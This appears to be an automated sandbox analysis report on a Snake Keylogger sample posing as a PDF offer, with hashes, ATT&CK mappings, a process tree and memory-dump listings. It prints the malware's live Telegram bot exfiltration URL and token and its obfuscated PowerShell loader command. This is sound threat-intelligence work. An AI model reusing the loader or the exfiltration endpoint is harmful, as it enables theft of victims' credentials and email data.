snakekeylogger | c4fe7447aea459eef046d371a5035d2fce7704c0af9e55423c62601ebbe34658

Analysis

max time kernel
150s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
31-10-2024 03:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Commercial offer+Technical offer_pdf.exe
Size

642KB
MD5

4806339fc2f24f3bab7fb6620826d603
SHA1

edc14208fcbd256801a2062dde49a52dd4f2890d
SHA256

5e0c5d2342ce0c3460d6c853a64efc16a89b9fe93372334d78163dfe7efb7e12
SHA512

70f75834b884a5a1309ca4b52b4b8d01ed63bccfd22e9fa9035ae3ac83582e46325de6f91bf39fd391db531117579170391f1a7710e8ccf67833d962b44b2182
SSDEEP

12288:ggu58UO/0Li3SaNlPhq7P9ekopAAT26ZvgVlmee/6BRERMHA+5QpU:gguuv0LPaNbqT9R2vgNeyTERMgm

Score

10^/10

snakekeylogger collection discovery execution keylogger spyware stealer

Malware Config

Extracted

Family

snakekeylogger

https://api.telegram.org/bot7557806283:AAFiqTWzN-gLgC-2y3c1Dz5CtqTp-HN6TYc/sendMessage?chat_id=7451270736

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 2 IoCs

resource	yara_rule
behavioral2/memory/4568-79-0x0000000000480000-0x00000000004A0000-memory.dmp	family_snakekeylogger
behavioral2/memory/4568-77-0x0000000000480000-0x00000000016D4000-memory.dmp	family_snakekeylogger

Snakekeylogger family
snakekeylogger

Loads dropped DLL 1 IoCs

pid	Process
4568	Mosel.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Mosel.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Mosel.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Mosel.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
27	drive.google.com
28	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
39	checkip.dyndns.org

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\Controvertibly244\Gyrated.for	Commercial offer+Technical offer_pdf.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4568	Mosel.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1136	powershell.exe
4568	Mosel.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1136	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Commercial offer+Technical offer_pdf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mosel.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
1136	powershell.exe
1136	powershell.exe
1136	powershell.exe
1136	powershell.exe
1136	powershell.exe
1136	powershell.exe
1136	powershell.exe
1136	powershell.exe
1136	powershell.exe
4568	Mosel.exe
4568	Mosel.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1136	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	1136	powershell.exe
Token: SeIncreaseQuotaPrivilege	1136	powershell.exe
Token: SeSecurityPrivilege	1136	powershell.exe
Token: SeTakeOwnershipPrivilege	1136	powershell.exe
Token: SeLoadDriverPrivilege	1136	powershell.exe
Token: SeSystemProfilePrivilege	1136	powershell.exe
Token: SeSystemtimePrivilege	1136	powershell.exe
Token: SeProfSingleProcessPrivilege	1136	powershell.exe
Token: SeIncBasePriorityPrivilege	1136	powershell.exe
Token: SeCreatePagefilePrivilege	1136	powershell.exe
Token: SeBackupPrivilege	1136	powershell.exe
Token: SeRestorePrivilege	1136	powershell.exe
Token: SeShutdownPrivilege	1136	powershell.exe
Token: SeDebugPrivilege	1136	powershell.exe
Token: SeSystemEnvironmentPrivilege	1136	powershell.exe
Token: SeRemoteShutdownPrivilege	1136	powershell.exe
Token: SeUndockPrivilege	1136	powershell.exe
Token: SeManageVolumePrivilege	1136	powershell.exe
Token: 33	1136	powershell.exe
Token: 34	1136	powershell.exe
Token: 35	1136	powershell.exe
Token: 36	1136	powershell.exe
Token: SeDebugPrivilege	4568	Mosel.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 1888 wrote to memory of 1136	1888	Commercial offer+Technical offer_pdf.exe	88
PID 1888 wrote to memory of 1136	1888	Commercial offer+Technical offer_pdf.exe	88
PID 1888 wrote to memory of 1136	1888	Commercial offer+Technical offer_pdf.exe	88
PID 1136 wrote to memory of 4568	1136	powershell.exe	97
PID 1136 wrote to memory of 4568	1136	powershell.exe	97
PID 1136 wrote to memory of 4568	1136	powershell.exe	97
PID 1136 wrote to memory of 4568	1136	powershell.exe	97

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Mosel.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Mosel.exe

C:\Users\Admin\AppData\Local\Temp\Commercial offer+Technical offer_pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Commercial offer+Technical offer_pdf.exe"
1⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1888
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle 1 "$Skiftebehandling=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\forurettendes\interventral\Tablespoonsful\Hpital.Svm';$thiosinamine=$Skiftebehandling.SubString(56308,3);.$thiosinamine($Skiftebehandling)
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1136
- - C:\Users\Admin\AppData\Local\Temp\Mosel.exe
    "C:\Users\Admin\AppData\Local\Temp\Mosel.exe"
    3⤵
    - Loads dropped DLL
    - Accesses Microsoft Outlook profiles
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:4568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Mosel.exe

Filesize
642KB

MD5
4806339fc2f24f3bab7fb6620826d603

SHA1
edc14208fcbd256801a2062dde49a52dd4f2890d

SHA256
5e0c5d2342ce0c3460d6c853a64efc16a89b9fe93372334d78163dfe7efb7e12

SHA512
70f75834b884a5a1309ca4b52b4b8d01ed63bccfd22e9fa9035ae3ac83582e46325de6f91bf39fd391db531117579170391f1a7710e8ccf67833d962b44b2182

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o3humow5.qzo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\forurettendes\interventral\Tablespoonsful\Hpital.Svm

Filesize
55KB

MD5
5c3047a848544b49eb82d09ed58708f3

SHA1
27c59daa34a25319f77d2dfe91613a4669803e21

SHA256
72a4194d8fcae2e4cfa2bd19dda030d1a7a05f27b2cc5197b6fceffb6b9decf0

SHA512
d783fa64387306adc639d5051bb153c5437ceeb1dc5abbd71d28cd2e1019209b13e1188bc94ab0ebe14cb94daba838293592361ea29451695f41d995b08c3e6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\forurettendes\interventral\Tablespoonsful\Ungrappling.Aft

Filesize
197KB

MD5
c5456a631a46305cb3526c31e9343f88

SHA1
bd8e00ea516f4cf63baeabf7a47826436a88550a

SHA256
e41c1ed91c989390d2ec88a3629bbfc63fddf1f2ae5b3eb84440888e65d68677

SHA512
6b13350a25698d31230cb14caebc8ab2996706df3e544e0745cf4b0248bd0f06710c53167fcca354d950b68fa59164678b3450a1a05b40e47b1dab89751fb2ed

Download Submit
memory/1136-32-0x0000000073EC0000-0x0000000074670000-memory.dmp

Filesize
7.7MB

Download
memory/1136-11-0x0000000006230000-0x0000000006296000-memory.dmp

Filesize
408KB

Download
memory/1136-12-0x00000000062A0000-0x0000000006306000-memory.dmp

Filesize
408KB

Download
memory/1136-49-0x0000000008640000-0x0000000008664000-memory.dmp

Filesize
144KB

Download
memory/1136-22-0x0000000006310000-0x0000000006664000-memory.dmp

Filesize
3.3MB

Download
memory/1136-23-0x00000000068F0000-0x000000000690E000-memory.dmp

Filesize
120KB

Download
memory/1136-24-0x0000000006940000-0x000000000698C000-memory.dmp

Filesize
304KB

Download
memory/1136-26-0x0000000006E30000-0x0000000006E4A000-memory.dmp

Filesize
104KB

Download
memory/1136-27-0x00000000078D0000-0x00000000078F2000-memory.dmp

Filesize
136KB

Download
memory/1136-25-0x0000000006E70000-0x0000000006F06000-memory.dmp

Filesize
600KB

Download
memory/1136-28-0x0000000007F50000-0x00000000084F4000-memory.dmp

Filesize
5.6MB

Download
memory/1136-8-0x0000000073EC0000-0x0000000074670000-memory.dmp

Filesize
7.7MB

Download
memory/1136-30-0x0000000008B80000-0x00000000091FA000-memory.dmp

Filesize
6.5MB

Download
memory/1136-33-0x0000000070350000-0x000000007039C000-memory.dmp

Filesize
304KB

Download
memory/1136-44-0x0000000007D80000-0x0000000007D9E000-memory.dmp

Filesize
120KB

Download
memory/1136-48-0x0000000007F00000-0x0000000007F2A000-memory.dmp

Filesize
168KB

Download
memory/1136-46-0x0000000007DB0000-0x0000000007E53000-memory.dmp

Filesize
652KB

Download
memory/1136-34-0x00000000704C0000-0x0000000070814000-memory.dmp

Filesize
3.3MB

Download
memory/1136-6-0x0000000073ECE000-0x0000000073ECF000-memory.dmp

Filesize
4KB

Download
memory/1136-47-0x0000000007EC0000-0x0000000007ECA000-memory.dmp

Filesize
40KB

Download
memory/1136-31-0x0000000007D40000-0x0000000007D72000-memory.dmp

Filesize
200KB

Download
memory/1136-10-0x0000000005950000-0x0000000005972000-memory.dmp

Filesize
136KB

Download
memory/1136-45-0x0000000073EC0000-0x0000000074670000-memory.dmp

Filesize
7.7MB

Download
memory/1136-50-0x0000000073EC0000-0x0000000074670000-memory.dmp

Filesize
7.7MB

Download
memory/1136-52-0x0000000073EC0000-0x0000000074670000-memory.dmp

Filesize
7.7MB

Download
memory/1136-9-0x00000000059D0000-0x0000000005FF8000-memory.dmp

Filesize
6.2MB

Download
memory/1136-55-0x0000000073EC0000-0x0000000074670000-memory.dmp

Filesize
7.7MB

Download
memory/1136-56-0x0000000073EC0000-0x0000000074670000-memory.dmp

Filesize
7.7MB

Download
memory/1136-54-0x0000000073ECE000-0x0000000073ECF000-memory.dmp

Filesize
4KB

Download
memory/1136-57-0x0000000073EC0000-0x0000000074670000-memory.dmp

Filesize
7.7MB

Download
memory/1136-59-0x0000000073EC0000-0x0000000074670000-memory.dmp

Filesize
7.7MB

Download
memory/1136-58-0x0000000009200000-0x000000000BD2B000-memory.dmp

Filesize
43.2MB

Download
memory/1136-60-0x0000000073EC0000-0x0000000074670000-memory.dmp

Filesize
7.7MB

Download
memory/1136-61-0x0000000073EC0000-0x0000000074670000-memory.dmp

Filesize
7.7MB

Download
memory/1136-7-0x0000000005360000-0x0000000005396000-memory.dmp

Filesize
216KB

Download
memory/1136-64-0x0000000073EC0000-0x0000000074670000-memory.dmp

Filesize
7.7MB

Download
memory/4568-79-0x0000000000480000-0x00000000004A0000-memory.dmp

Filesize
128KB

Download
memory/4568-77-0x0000000000480000-0x00000000016D4000-memory.dmp

Filesize
18.3MB

Download
memory/4568-80-0x0000000023090000-0x000000002312C000-memory.dmp

Filesize
624KB

Download
memory/4568-83-0x0000000023580000-0x00000000235D0000-memory.dmp

Filesize
320KB

Download
memory/4568-84-0x00000000235D0000-0x0000000023792000-memory.dmp

Filesize
1.8MB

Download
memory/4568-85-0x00000000237B0000-0x0000000023842000-memory.dmp

Filesize
584KB

Download
memory/4568-86-0x00000000238A0000-0x00000000238AA000-memory.dmp

Filesize
40KB

Download